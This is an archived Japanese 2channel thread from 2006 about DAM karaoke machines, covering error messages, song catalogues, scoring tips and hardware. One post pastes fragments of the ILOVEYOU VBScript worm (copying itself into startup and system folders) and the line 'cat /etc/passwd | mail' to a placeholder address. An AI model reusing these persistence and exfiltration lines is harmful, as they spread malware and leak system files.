2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【奉仕ひとすじ】DAM総合スレ 2番【尽くす道】

1 :国土交通省河川局:2006/02/28(火) 01:21:04 ID:XBprV/XO
株式会社第一興商のカラオケDAMについての総合スレッドです。
既存の個別スレッドでは対応できない話題はこちらにどうぞ。
---------------------------
前スレ
【カラオケで】DAM総合スレ【明日をつくる】
http://music4.2ch.net/test/read.cgi/karaok/1094126189/
---------------------------
関連リンク
clubdam
http://www.clubdam.com/

株式会社第一興商
http://www.dkkaraoke.co.jp/
---------------------------
関連スレッド
★★BB cyber DAMってどう?★★ 
http://music4.2ch.net/test/read.cgi/karaok/1067650136/

【DAMステ】ClubDAMMEMBERSHIP総合スレ【ランバト】
http://music4.2ch.net/test/read.cgi/karaok/1129542410/

ビッグエコーについて…
http://music4.2ch.net/test/read.cgi/karaok/1090133742/

カラオケで100点を目指すスレ(DAMで)
http://music4.2ch.net/test/read.cgi/karaok/1073234857/

DAMの消費カロリーを自慢するスレ
http://music4.2ch.net/test/read.cgi/karaok/1081953035/

2 :選曲してください:2006/02/28(火) 02:14:12 ID:WZKSVqPS
1の母「この度は息子がクソスレを立ててしまいまことに申し訳ありません」
1の妹「あんなにやさしかったお兄ちゃんが突然おかしくなっちゃったの」
1の精神科医「1は重度の精神障害を引き起こしている」
1のエクソシスト「1には悪霊が数体とり憑いており大変危険な状態だ」
1の主治医「お気の毒ですがもって3ヶ月。回復の見込みはないでしょう」
1の同級生「いつかはやるだろうとみんなから言われていました」
1を介護するロボット「介護モ困難ナ状態ニアリマシタガココマデハ予測デキマセンデシタ」
1の体内に金属片を埋めた宇宙人「1ヲ実験体二スルニハ無理ガアッタヨウダ」
1の初体験の相手のソープ嬢「オドオドしていて雰囲気が怖かったです」
1の家臣「このような時にご乱心あそばされるとは無念の至りでござる」
1の精子「オナーニをやめたかと思えばこんなことをしているとは!」
1の召喚獣「史上最凶の生物を召還する前触れです。それだけは阻止してください!」
1のシーモンキー「こんなやつに飼育されるのは奴隷以下の存在。悲しいです」
1の暗殺を狙う工作員「このような暴挙に出るとは。1に接近するのはまだ危険だ」
1の中学生時代の担任「1の将来は心配していましたが・・・私の力不足でした」
1の幕僚「今宵我ら幕僚一同はクーデターを起こし1を暗殺する!」
1を尾行していた公安当局「まだ危険が終わったとはいえない。引き続き監視を続ける」
1と同期の幕内力士「ごっつぁんです、1が帰ってきたら存分にシゴいてやるっす!」
1を蘇らせたネクロマンサー「魔族をもはるかに超えた邪悪な力を感じる。暗黒時代の到来だ」
1へ。(ビートたけし)「カローラがこんなに変われる時代だ。1はどうだい?」
1の事件を知ったブッシュ大統領「1への報復のためならばいかなる行動も辞さない!」
1の事件を知った小泉首相「Show the Flag ! 全力で後方支援をする」
1の事件を知った金大中氏「今回の1の行動に対して謝罪と賠償を要求する」
1の事件を知ったビン・ラディン氏「これはジハードだ!若者よ立ち上がれ!」

3 :選曲してください:2006/02/28(火) 18:48:38 ID:D8tLseqS
ダッシュ3!!!

4 :選曲してください:2006/02/28(火) 20:30:38 ID:vYOtrO8P
この2のコピペっていったいいつの時代のやつだよw
すごい過疎スレでも見ないなあ

5 :選曲してください:2006/03/01(水) 20:24:42 ID:jzWSwEGr
このままだと即死に引っ掛かるぞ

6 :選曲してください:2006/03/01(水) 22:58:35 ID:h/0ABfJT
HDD-A(システム?)
HDD-B(映像)
HDD-C(知らん)

7 :選曲してください:2006/03/02(木) 06:50:45 ID:6/QcT6es
前スレ埋めろよ

8 :選曲してください:2006/03/03(金) 05:06:37 ID:eUBYyOnj
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
kak.hta';ken=wdt'START
ms-its:mhtml:file://c:\
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

9 :選曲してください:2006/03/03(金) 23:50:40 ID:zofsb09E
「独りデュエット」はどーやったら使えるの?

10 :選曲してください:2006/03/04(土) 13:51:26 ID:kzx8HS27
>>9
ボーカルアダプタVA-200つけないと無理

11 :選曲してください:2006/03/05(日) 19:36:48 ID:Dpmnw7sV
このきょくすうどうにかなりませんか?

12 :選曲してください:2006/03/06(月) 01:43:01 ID:yRN9P9KL
ぬるぽ

13 :選曲してください:2006/03/06(月) 16:34:10 ID:zSZjm5La
>>11
お前が死んでるころには充実してるよ

14 :選曲してください:2006/03/09(木) 23:01:39 ID:XR1opKj2
チャララン♪(女性の声で)
いつもDAMをご利用頂き誠にありがとうございます。
この端末は通信上の問題が発生しており新しいデータを受けられない状態にあります。

最終配信が2005/03/03なのに・・・ひどい。

15 :選曲してください:2006/03/10(金) 01:49:19 ID:rFM5e5h3
ひでぇ店だな

16 :選曲してください:2006/03/10(金) 16:39:05 ID:Ud2XaI8z
>>14
その状態のままだとロックが掛かる
なんとかしろ

17 :14:2006/03/10(金) 23:18:35 ID:PiGgcIPW
実はその店でバイトしてるんだが、こりゃヤバイ!えらいこっちゃと、
慌てて機械裏を見たらLANハブのACアダプタが抜けてましたとさ。(ダムステ部屋)
演奏警告表示解除の操作をしたので直りましたが・・・
ところが、その直後にLANハブが無い筈のノーマル部屋でも同じ表示が・・・Why?
センターへの通信は出来ているので店側の問題ではなさそうです。

最新データが受信されているのにこの警告表示はおかしい。
配線が抜けている等で通信出来ない場合、2週間データが来ないと起動時に
「この端末は配信を受けていない為、このままではカラオケ演奏に支障をきたします」
と出る筈。

バグですかね?>DKさん


18 :選曲してください:2006/03/13(月) 18:01:43 ID:fG4QG8AW
今週15日発売の曲はいつうたえるようになるの?
教えて下さい。

19 :選曲してください:2006/03/14(火) 01:26:50 ID:iQxMWsUI
チャートに名を連ねるような曲なら15日

20 :選曲してください:2006/03/14(火) 08:30:52 ID:eAHDVqQ5
>>18
お前さ、JOYV2のスレにもかいてなかったか?

21 :選曲してください:2006/03/14(火) 10:52:26 ID:7rw5eNrs
ごめん
書いてた
カラオケ屋に電話もした
でもわからんと言われた

22 :選曲してください:2006/03/14(火) 12:23:23 ID:eAHDVqQ5
>>21
カラオケ屋の人に聞いてもわからなくて当たり前
カラオケ屋=コマンダーの発売元じゃないからな

>>19が一番妥当な答えだと思うが

23 :選曲してください:2006/03/14(火) 23:14:51 ID:7rw5eNrs
良かった
じゃあELTのもあるね

24 :選曲してください:2006/03/15(水) 21:41:05 ID:GbqSbZMW
「サイバーダムexpress」って販売しているんでしょうか?
表紙に値段が書いてあったので、もしかしたらと思ったんですが。

25 :選曲してください:2006/03/16(木) 00:15:15 ID:ZoPegg2C
>>24
DKの営業所に行けば売ってくれる。分厚い目次本もな。
やる気の無さそうな社員さんが相手してくれるYO

26 :選曲してください:2006/03/16(木) 12:46:28 ID:E3YYLolK
>>25
おーどうもありがとう。行ってくる。

27 :選曲してください:2006/03/20(月) 03:16:58 ID:x5nmUix3
わざわざカラオケBOXと渋谷デュオ(だっけ)を結んで対談する意味はあるのか
あと最近発売された「桜風」を
平山あやは「桜坂」といっている気がするんだが

28 :選曲してください:2006/03/20(月) 14:31:17 ID:cLEL348c
4月新譜発表まだなの?
って思ったらpdf版があった
ttp://www.dkkaraoke.co.jp/business/karaoke_service/introduction/pdf/2006_dam/4/bb_cyberdam/newsong.pdf
html版も早くおねがいします

29 :選曲してください:2006/03/26(日) 19:57:24 ID:l//42+y4
f-stageだとプリンターの電源が切りにくい件について。

30 :選曲してください:2006/03/27(月) 10:45:33 ID:yeCdIRca
ケロッ!とマーチをケロロ軍曹の動画にしてくれ。

31 :選曲してください:2006/03/29(水) 18:09:44 ID:kAXRacly
new cyber DAMって機種の採点で一般的な上手さの人の得点はどのくらいでしょうか?

32 :選曲してください:2006/03/30(木) 09:47:12 ID:iSlFGF9v
知りません

33 :選曲してください:2006/03/31(金) 14:59:18 ID:uBMxHabW
DAMのリモコンにボイスチェンジの表示があるのに出来ないのは仕様ですかそうですか
・・・・もしかしてジャ○カラだけ?

34 :選曲してください:2006/03/31(金) 15:08:49 ID:1FDLXObz
早送りや一時停止するとPV映像から変なDAM特有の映像に変わってしまうんだけど
これってどうやったら切り替わらないように出来る?

35 :選曲してください:2006/03/31(金) 16:39:28 ID:AIpAP8WT
>>33
Voice Adapter DAM-VA200が必要。
>>34
仕様。

36 :選曲してください:2006/03/31(金) 21:24:51 ID:CGSx98Jv
>>34
PVと同期が取れなくなるからかと。

37 :34:2006/03/31(金) 22:41:34 ID:1FDLXObz
>>35>>36
そうなんだ。どうしようもないんだね
どうもありがとう

38 :選曲してください:2006/04/02(日) 04:12:06 ID:B0aDHsBd
DAMの精密で95点以上でないんだけど、95点以上出てる方いますか?
ビブラートと抑揚って、てきとうに歌ってるとなるけど
意識してやるとぜんぜんorz
それにしゃくりを0回に抑えて音程もあってるけど抑揚が低くて87〜93の間をさまよってたり・・・

39 :選曲してください:2006/04/02(日) 23:42:17 ID:Ddrttheh
奉公ひとすじなのになんで曲数が糞なの?
もっといれてよ

40 :選曲してください:2006/04/05(水) 07:05:50 ID:aDIyEKnD
>>38
得意分野なら97点までは行ける。

41 :選曲してください:2006/04/11(火) 23:08:20 ID:cyrhvx4H
DAMステーションのソフトアップデートされた?
勝手にトップに戻るのがウザったい…

42 :選曲してください:2006/04/12(水) 02:20:20 ID:lM0OwNLG
>>41
DS2ならうpデートされた可能性有り。

43 :名無し募集中。。。:2006/04/12(水) 18:33:08 ID:Ghn3tFKl
DAMの機種によって入ってる曲と入ってない曲があるの?

44 :選曲してください:2006/04/13(木) 18:43:47 ID:tLtnQ4JJ
>>43
Yes

BBCDAM>CDAM>64

45 :選曲してください:2006/04/13(木) 23:29:17 ID:jQG9EvL2
この端末は配信を受けていない為このままではカラオケ演奏に支障をきたします。
配信を受けられる状態にしてくだちい。

46 :選曲してください:2006/04/14(金) 10:01:10 ID:L8PNBvJQ
>>45
 韓国製だしな。

47 :選曲してください:2006/04/14(金) 10:29:28 ID:jIdlEWSP
メイド in 氷や

48 :選曲してください:2006/04/14(金) 23:48:37 ID:neblQp1t
チャララン♪
いつもDAMをご利用頂き誠にありがとうございます。
この端末は通信上の問題が発生しており新しいデータを受けられない状態にあります。


49 :選曲してください:2006/04/15(土) 21:29:21 ID:gzWvMT1V
4063-01 近鉄バファローズの歌、映像変わったのかorz
試合映像復活きぼんぬ

50 :選曲してください:2006/04/16(日) 01:35:02 ID:jKsgOE31
>49
映像に小川博が出てたからな…しゃあない。

51 :選曲してください:2006/04/18(火) 22:52:11 ID:wjZoJDt7
家の電話がエロモード対応なので、明日をつくるをDLして着信音にしてみた。

52 :選曲してください:2006/04/19(水) 18:41:30 ID:nr8Gf1hm
社歌聴けるサイト無いの?

53 :選曲してください:2006/04/19(水) 20:40:35 ID:PCpsKS/L
>>52
無いよ。だってDKさんの社内ユースの為に存在してるから。
だからデンモクにも早見表にも載ってない。
直入力かダムステで検索。

54 :選曲してください:2006/04/20(木) 18:51:20 ID:VG7wMCsz
第一興商社内では、歌われているのかなあ(´・ω・`)

55 :選曲してください:2006/04/20(木) 22:52:46 ID:LQYAI1Ef
<丶`∀´><ウリは歌詞を見ずに1番から3番まで歌える。

56 :選曲してください:2006/04/26(水) 01:19:51 ID:K0OlAGde
G100(BB)搭載曲数74900曲突破!

57 :選曲してください:2006/04/26(水) 01:41:57 ID:0zrGpkpR
目指せ749万曲!

58 :選曲してください:2006/04/26(水) 18:22:08 ID:ymqRs8zj
>>57
世界中の音楽やインディースを網羅しても集まるか集まらないかの問題。
目次本が死ぬほど厚くなる。それ以前に選曲番号が全然たりねぇじゃん!!!

59 :選曲してください:2006/04/26(水) 19:13:05 ID:K0OlAGde
Σシステムを一つのコマンダーで実現してくれれば神なんだが・・・
ベースはG100で。

60 :選曲してください:2006/04/26(水) 20:11:03 ID:0zrGpkpR
>>58
5桁-3桁仕様にする。今までのは4−2でも選局可能な仕様にして。

61 :選曲してください:2006/04/27(木) 16:09:30 ID:R0S8o46t
G100よく見てみ
AボタンとBボタンが本体についてるから

62 :選曲してください:2006/04/27(木) 18:48:38 ID:o5fQ/MVl
>>61
6400にもそのようなボタンが付いていた記憶が
6桁+ABボタンで何曲まで逝ける?

63 :選曲してください:2006/04/27(木) 21:57:10 ID:zdo0VCYu
最大2,999,997曲
(AB無し・A・B合計)

64 :選曲してください:2006/04/28(金) 09:40:44 ID:GYQtGGu2
A・BボタンってLD時代の名残かと思ってたんだけど、違うの?


65 :選曲してください:2006/04/28(金) 11:42:04 ID:/hwR7JDf
「うたれん」の点数で言うと何点くらいが一般レベルの歌唱力になりますか?
もしくは練習の場合は精密採点のほうが良いですか?

66 :選曲してください:2006/05/12(金) 23:43:30 ID:ejThWs2V
質問なんですが、DJ OZMAの曲は本人出演映像はありますか? 

67 :選曲してください:2006/05/14(日) 02:00:08 ID:4pJYaCc9
配信されてねーぞ。このままじゃヤバイよ
的なメッセージがBEでG100Fの電源を入れた時に出た…

つーか、店員はウチらを試しているのか?この間はプリンタ電源切ってランバトしたし。(退出時はONにしたが)

68 :選曲してください:2006/05/14(日) 12:06:21 ID:0GpZUZlZ
何で客が電源入れるのかわからんが、(節電?)
配信云々はDAMクオリティだな。
うちの店でも出る。最新のデータまで配信されても出る。

69 :選曲してください:2006/05/14(日) 20:25:18 ID:xd9KcTQh
agee

70 :選曲してください:2006/05/15(月) 17:51:20 ID:prNv2OeW
節電というか、DANって電源切ってもファン回りっぱなしじゃね?
しかもリモコンでOPEN/CLOSE押したらしっかり動くし。

省エネなのこれ?

71 :G100の中の人:2006/05/16(火) 01:15:28 ID:fVFPOj+2
>>70
冷却の為なんです。何せ、HDDを3台も積んでるんで暑くて×2
収納されてるラックの通気性が悪いと稼働中の本体からモワーッと熱気がしますよ。
是非お試しあれ♪
しばらくすると完全にファンも止まりますよ。


72 :選曲してください:2006/05/16(火) 01:43:29 ID:kpKyR2aC
>>71
お試しアレってw

73 :選曲してください:2006/05/16(火) 01:53:28 ID:btDXFHa2
というか、HDDって海門?それともHGST?

海門が750GB出したし(約7万円)、HDDも1プラ160GBのHDD出したから、800GBがDELLのは時間の問題。

よってG100/Fは2.4TBができるね。

74 :選曲してください:2006/05/16(火) 02:04:36 ID:3lBXQ/tK
SATAなのか?

75 :G100のメカニック:2006/05/17(水) 00:13:26 ID:FXYkqJ0s
>>73-74
ちとHDD見て来るわ。

76 :選曲してください:2006/05/17(水) 16:13:28 ID:PmQx4aA9
>>71
6400USは稼動中G50やG100よりも異常に熱いのだが仕様?

77 :G100の中の人:2006/05/17(水) 18:52:02 ID:FXYkqJ0s
>>76
知らん。店にG100しかないもん。

78 :選曲してください:2006/05/17(水) 23:18:06 ID:nq9QuZi7
亀ですいません
大阪の南部(難波〜布施〜小阪辺り)でDAMがあるとこってどこかありますか?
うちの周辺UGAしかないんですorz
教えて下さいお願いします

79 :選曲してください:2006/05/17(水) 23:30:34 ID:FXYkqJ0s
>>78
シダックスとか。

80 :選曲してください:2006/05/17(水) 23:36:36 ID:/x9/fM0K
>>78
ビッグエコーとか

81 :選曲してください:2006/05/18(木) 00:00:13 ID:/AUGhBj1
サンクス!
ジャンカラしか行ったことないんですよ
そこって会員制とかですか?

82 :選曲してください:2006/05/18(木) 01:53:10 ID:Omd6AuTL
会員制じゃないけど、会員にならないと料金うp

83 :選曲してください:2006/05/20(土) 12:32:33 ID:7Wk35yb1
カラオケ講座みたいなやつが配信されてるのってDAMだっけ?

84 :選曲してください:2006/05/25(木) 00:22:29 ID:vdvp/sS/
DAMの採点ゲームで練習モードみたいなのがありますよね?
あれって音程が外れたら文字のとこに!や×が出ますけど、皆さんだいたいどのくらい出ますか?
てゆうか1回でも出たら音を外してるってことだから、出なくなるまで人前では歌わない方がいいですよね?
ボクまだヒトカラしか行ったことなくて、今度人前で音外さずに歌えるように一人で練習してるんです(つд`)

85 :選曲してください:2006/05/25(木) 01:02:41 ID:cFRi/l+k
>>84
うたれん。
俺はいつもHARDでやってるが、?や!や×は結構でる。
点数は歌にもよるが、HARDでだいたい55〜85点くらい。


86 :選曲してください:2006/05/25(木) 21:23:38 ID:oN6Xa5t9
宇宙人が出てくる採点って舐めすぎじゃね。
精密採点なら60点なのに80は出るよね

87 :選曲してください:2006/05/25(木) 23:47:44 ID:vdvp/sS/
そりゃハードなら出るでしょうよ…
ノーマルで出まくるのってヤバイですよね…?

88 :選曲してください:2006/05/27(土) 22:54:54 ID:Ajn35h+q
               ,,,..---、
          ,,ィニニヽ彡彡彡彡ミニ三ミ、
        ,ィミシ彡ミミ、゙彡彡彡三ミ、彡イ三;ヽ
       {彡y彡彡y彡ミ 彡彡三三彡Y彡三ミ}
       {ツ彡シィイイ彡ミ 彡三ミミシシヾミ三シ
       (彡彡イ/////ノ〃〃ハ;ヾヾミ三彡Y 三)
       {彡y///イ/     ミヾヾミ三彡Yシイ
        Y((( /       `ミミ三三彡イミ、
         !、,,,_     _,,,..---  ゙ミ,ィイi }ミ三;シ
          }T゙'tゝ .:´ ィ弋カ'-    Y/5 /i川イ
         !  ̄ .i :.   ̄ ...    ーノミト、シ
         ',:.:. ,' ::.    .:.:.:.:    iイミ三ソ
         ',  ヽ ー        !::ミミ三リ
          ヽ. ゙'三‐‐‐'`     ノ :::iーーー'
           `、      , '  : :',
             ` ー-┬‐ '     : :ヽ
                  |        : : \
              ___....l:: ::  __ , ---.ヽ

         コッチ・ミンナ [Cottch Minna]
           ( 1979〜  イタリア )


89 :選曲してください:2006/05/29(月) 01:32:11 ID:AzPoLpVA
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
■□□□■■■■□□□□■■□□□■■■■□□□□■■□□□■■■■□□□□■
■□□□□□□□□□□□■■□□□□□□□□□□□■■□□□□□□□□□□□■
■□□□□□□□□□□□■■□□□□□□□□□□□■■□□□□□□□□□□□■
■□□□■■■■□□□□■■□□□■■■■□□□□■■□□□■■■■□□□□■
■■■■■■■□□□□■■■■■■■■■□□□□■■■■■■■■■□□□□■■
■■■■■■□□□□■■■■■■■■■□□□□■■■■■■■■■□□□□■■■
■■■■■□□□□□■■■■■■■■□□□□□■■■■■■■■□□□□□■■■
■■■■□□□□□■■■■■■■■□□□□□■■■■■■■■□□□□□■■■■
■■■□□□□□□■■■■■■■□□□□□□■■■■■■■□□□□□□■■■■
■■■□□□□□□■■■■■■■□□□□□□■■■■■■■□□□□□□■■■■
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■


90 : ◆L1RUYrZ3yI :2006/06/12(月) 09:37:07 ID:U7NcAjGz
 

91 :選曲してください:2006/06/14(水) 16:18:07 ID:DYJg+cLl
皆様、金帯のマイクと、緑帯のマイクでは、どちらを良く使いますか?

92 :選曲してください:2006/06/15(木) 07:54:45 ID:Z6G3Fmlj
元気の良さそうな方


93 :選曲してください:2006/06/15(木) 10:56:25 ID:lNTvDCMl
みなさんはそんなことないと思うけど、私はマイデンモクのログアウトを
忘れて終わってしまったことがあります。
そうしたら、じぶんの持ち歌に、前の人のデーターがいっぱい入ってきま
した。
しかたなしに「赤いランプの終列車」をうたったこともあります。
みなさんも、気をつけてくださいね。

94 :選曲してください :2006/06/16(金) 12:18:08 ID:Gm2oGVvA
あまりに面白く凝ったニックネームが現れて、思わず噴き出してしまい
順位下降の矢印が出たことがありました。

95 :選曲してください:2006/06/16(金) 19:40:48 ID:WhEiG8Hm
たとえばどんなニックネーム?

96 :選曲してください:2006/06/17(土) 01:06:52 ID:6IyNJ6U2
”ぬるぽ”とかな。

97 :選曲してください:2006/06/17(土) 02:57:01 ID:E8yfWJ6+
「君が代の神」は吹いたなぁ。君が代限定で一位によくいる。

98 :選曲してください:2006/06/17(土) 05:07:44 ID:vNwL4/wB
腹黒姉妹・・・
結構純粋な選曲してるのに・・・

99 :選曲してください:2006/06/19(月) 23:32:52 ID:Sgnn5Xy9
DQ…じゃなくてDKの社員さんはメンテナンスついでにJOYやUGAの設定をいじくったり、スピーカーの配線を切断したりするってホントですかね?
店員としては凄い迷惑な訳だが。

100 :選曲してください:2006/06/19(月) 23:41:05 ID:wbF/wLdm
そんなことしてたら普通に訴えられるだろう

101 :選曲してください:2006/06/26(月) 12:07:29 ID:9k/UyB+R
みなさんはどうされているか、よろしければ教えてください。
DAM機の、カラオケのボリューム、マイクのボリューム
全体の音量などの「つまみ」に、よくちいさな赤くてまるい
シールがはってあります。
そこが、適音だということでしょう。
わたしは、そのままつかっていますが、エコーの「つまみ」も
ふくめて、自分で調整したほうがよいのでしょうか?
よい点数がでるのでしょうか?

102 :選曲してください:2006/06/26(月) 12:27:20 ID:tZMSRRPa
>>101
シールは店員さんが現状復帰させるときの目安だと思われ…
短時間で片付けるのに毎回微調整できないでしょうし。

私は録音するんでヒトカラのときはエコー完全に切ってますよ。
ついでに音割れしないレベルに主音量も下げてます。
その辺の調整は各人の好みじゃないかな?

タカラの時はハウリング起こさなければ大抵そのまま使ってますね。

103 :選曲してください:2006/06/27(火) 00:52:10 ID:iCQ+rzE9
>>102
下げる分には問題無いけど、揚げるのは止めておいた方がいい。

104 :選曲してください:2006/06/29(木) 15:23:20 ID:RRFlVxnL
月初めに高順位が取れるのは当然ですよね。
参加人数が少ないですから。
そうではなくて、私が思うのは、月の上旬に自分が取った高得点を、
後から抜くのは、月末になるほど難しくなるということです。
私だけの傾向でしょうか。
皆様はいかがでしょうか?

105 :選曲してください:2006/06/29(木) 22:32:01 ID:tfC4Umwk
すごく久しぶりに正統派の書き込みを見た。

106 :選曲してください :2006/06/30(金) 13:45:37 ID:yD5VEb/N
>>104
同感です。何故でしょう。

107 :選曲してください:2006/06/30(金) 14:20:32 ID:RfbpCxqI
>>104の高得点って99点未満も入ります?

俺的には95、96辺りは高得点には入りません
またその辺りは月後半でも自己更新がさほど難しくない感じです

108 :選曲してください:2006/07/01(土) 23:51:16 ID:GB96eX8/
私は抜きつ抜かれつで月末までです。

109 :選曲してください :2006/07/03(月) 12:21:21 ID:DMrzd1O6
周囲に奇異にみられながら、得点を上げるため、いろんな方法を
試行錯誤し、つぎの点を見つけました。
(ただし、この方法は、89点程度を94点程度に上げるための
 ものであり、決して、99点などという本当の高得点を出すた
 めのものではないことを、お断りします)
(また、なん人かでボックスに行った場合や、カラオケ喫茶に行
 った場合は、周りに奇妙に見られることも、お断りします)
1.普通自分が歌うキーより、1〜2♭、下げる
2.カラオケボリュームはやや高め(シールより若干上)
3.マイクボリュームはやや低め(シールより若干下)
4.全体ボリュームは普通、エコーも普通
5.周囲から少し不潔だと言われますが、マイクを下唇の下、
  あごのあたりに付けるようにする
6.流れるように歌うのではなく、極端に言えば、一音一音
  ぶつぶつ区切って歌うくらいにする
(これは、別の表現で、以前にも出ていましたが)
7.この場合、一音一音のことばを明瞭に、音程を正確に歌
  う
これは、あくまで邪道ですから、正しい歌い方を学ぶほうが
大事だと思うことを、お断りします。

110 :選曲してください:2006/07/04(火) 02:51:30 ID:tduVjBvc
>>107
どんだけランバト用なんですか?
96やら95で高得点と言わないあなたの歌ぜひ聞きたいですね、うpしてみて

111 :選曲してください:2006/07/04(火) 03:12:16 ID:J4TOnrLx
>>110
確かに聞いてはみたいね

ただ基準は人それぞれってことじゃね
99点でも前半だと満足すらしない変わり者もいたじゃんw

112 :選曲してください:2006/07/04(火) 05:19:02 ID:kbZfelFr
>>110
>>107で「95、96辺りは高得点には入らない」と書いたのは
そこら辺は結構コンスタントに出せるようになったからです
未だに97〜は一曲たりと出せた覚えがありません
一度は99出したい、95じゃ3位にもなれねーちきしょー、
みたいな思い結構してます

つーことなんですけど聞きたいですか?(w
>>107は110-111さん他に誤解を与えるような書き方だったかも

まー俺の音源なんて聞き飽きてはるにちげーねーと思いますが

113 :選曲してください :2006/07/04(火) 09:05:42 ID:3iI3Pyzg
>>109
自分にはあまり影響なかったス
文章で理解するより、実際口頭で聞いて理解する
ような事柄と思うけど


114 :選曲してください :2006/07/05(水) 09:59:10 ID:d/LZYwgv
>>109
私も、これで点数が上がったということはありませんでした。
文面からは、伝わってないかも。

115 :選曲してください :2006/07/06(木) 10:12:02 ID:KqafP7uc
私の経験からいいますと、やはり〔音程〕が、得点の9割以上〔もっと
かな〕だと思います。
あとは、リズムとか抑揚とか。
私が、楽器で、音程合わせしてもらって、修正しながら覚えた曲はいい
点がでます。
とはいいましても、私が歌が上手く、高得点を出せるひとという意味で
はありません。
きちんと覚えた歌以外は、いつも低い点です。
よくコーラスの練習で、最初の音程だけピアノで出してもらって、あと
は、伴奏なしで歌い、歌い終わりの音と、楽譜にある正しい音程と、ず
いぶん開きがあることも経験しました。

116 :選曲してください:2006/07/07(金) 16:35:54 ID:80oSKAOG
>>115
 言うとおりだけど。
 自分の場合は、レッスン受ける時間と暇もないし、ピアノも弾けないし
 伴奏して、音程を直してくれる人もいません。
 自分はどうしているかというと、ここでは申し訳けないのですが、ある
 カラオケ機器で、初心者用にメロディーラインを大きくすることのでき
 る、カラオケ機器があります。
 まず、それで、自分に合った少ない種類の曲を、ひとつづつ覚えていっ
 ています。

117 :選曲してください:2006/07/09(日) 12:26:30 ID:iargxdl6
私の経験では以下の通りです。
1.本職の歌手本人が歌っているCDは、なん度聴いても、あまり
  得点を上げる参考になりませんでした。
2.そこで、たいへんもったいないのですが、DAMのマイクボリ
  ュームを0にし、DAMの演奏だけ(とくに小さく流れている
  メロディー)を、なん回もなん回も聴きました。
  そして、覚えこんだメロディー通りに、歌っていくようにしま
  した。そうしたところ、点数が上がりました。
3.歌手は、ステージで歌を聞かせ,CDを買ってもらう職業です
  から、味付けがしてあって、少し違うと思うのです。
4.それから「音程」が最も大切なのはいうまでもありませんが、
  必要なところでは「声量」も、ものをいうことがわかりました。
5.それと、前出で、流れるように歌うより、切ったように歌うと
  いうアドバイスがいくつかありました。
  私の場合は、それで青矢印が出て、逆に順位がさがったことも
  あります。切るところも、流れるようにするところもあると思
  うのです。

118 :塩尻のアニメ女王:2006/07/12(水) 09:06:15 ID:RcHZxgQK
デンモクのキャラクターを変えてくれてありがとうございます。
私はアニメっぽいものが好きなんだけど、ちょっと芸術的にな
っていました。

119 :選曲してください:2006/07/13(木) 09:08:29 ID:MF7Pa7QC
デンモクのキャラクター?

120 :選曲してください:2006/07/14(金) 05:38:24 ID:UB0zR5DA
今日DAMやったらスラムダンクの動画がごっそりなくなってたあsjkふぁskhふぁしゅ

121 :選曲してください:2006/07/15(土) 10:50:17 ID:jp2GMI4r
点数稼ぎたい場合は、

・無線マイク用のアンプ(?)の音量(?)を最大に
・メインのカラオケ機でのマイク音量を極小に(これは実際に聞こえる音が大きくなり過ぎない為)

ってやっとくと、声量があると判断されるらしくて高得点になったけど今もそう?

122 :選曲してください:2006/07/17(月) 16:04:57 ID:lJvitMsL
なんかキーとかもあらかじめ設定できる画面付きのでっかいペンタッチ式のリモコみたいのがあるのってDAMだけ?

123 :選曲してください:2006/07/18(火) 00:54:47 ID:9BoV8STi
>>122
JOYにもある。キョクNAVIという名前。UGAにもあるらしいが見たことない。

124 :選曲してください:2006/07/18(火) 04:26:20 ID:0I+XmOjA
UGA+にもデンモクそっくりのデンモクがあるぞ

125 :選曲してください:2006/07/18(火) 09:18:14 ID:7jEDAIl3
>>123-124
サンクス。
あれデンモクって言うのか。
見たこと無いってことはUGAには滅多に置いてないのかな?
DAMはほとんどのとこに置いてあるみたいだけど
JOYにも大体のとこに置いてある?

126 :選曲してください:2006/07/18(火) 14:13:13 ID:b5sAjBn/
自分は、同じ歌手でも隣接する3段階のキーで歌ってみると
高い得点が出せるキーがわかります。
また、同じ歌手でも、曲によってキーの段階を、細かく選ぶ
といいと思います。
ご参考になるかどうか。

127 :選曲してください:2006/07/18(火) 17:12:55 ID:+LARJzQD
UGAのはナビカラだったはず。
うちの店には全部屋にあるけど。

128 :選曲してください:2006/07/18(火) 21:48:53 ID:Ax/bbPMK
BB Cyber DAM=DAMステーションと思っている店員がいて困る。

歌○んだ村…

129 :選曲してください:2006/07/18(火) 23:44:36 ID:S6DuONQU
UGAの話ですまないけど、UGAで大抵置いてあるナビカラ・コナビの他に、
昔ながらのデンモクも使えるんじゃない?
仕様が同じなのか、B-karaでも使われてたし。

130 :選曲してください:2006/07/19(水) 11:16:13 ID:DC26viBO
>>126
ただただ無心で歌ったら、97点以上でるときがありました。
いろいろ考えて歌ったら、80点台になるときもありました。

131 :選曲してください:2006/07/20(木) 00:17:39 ID:mOecDvkV
http://www.clubdam.com/damstation/index.html

DAMの検定とかオーディションとかっていろいろとコンテンツがあって
面白いんだけど、こういうので検定だの採点をやってもらうだけじゃなくて、
通信できるんだから、カラオケ教室だのボーカル講座だのもやってくれないかな?
全国どこのカラオケボックスでもボーカル講座だかカラオケ教室だかを
受けられることになるわけでさ。

132 :選曲してください:2006/07/20(木) 19:04:24 ID:IrQjl2Fb
94〜95点の壁がどうしても越えられません・・・
大体心を込めて、普通に歌っている感じですが、
その先に行くにはどのようなことを心がければよいでしょうか?

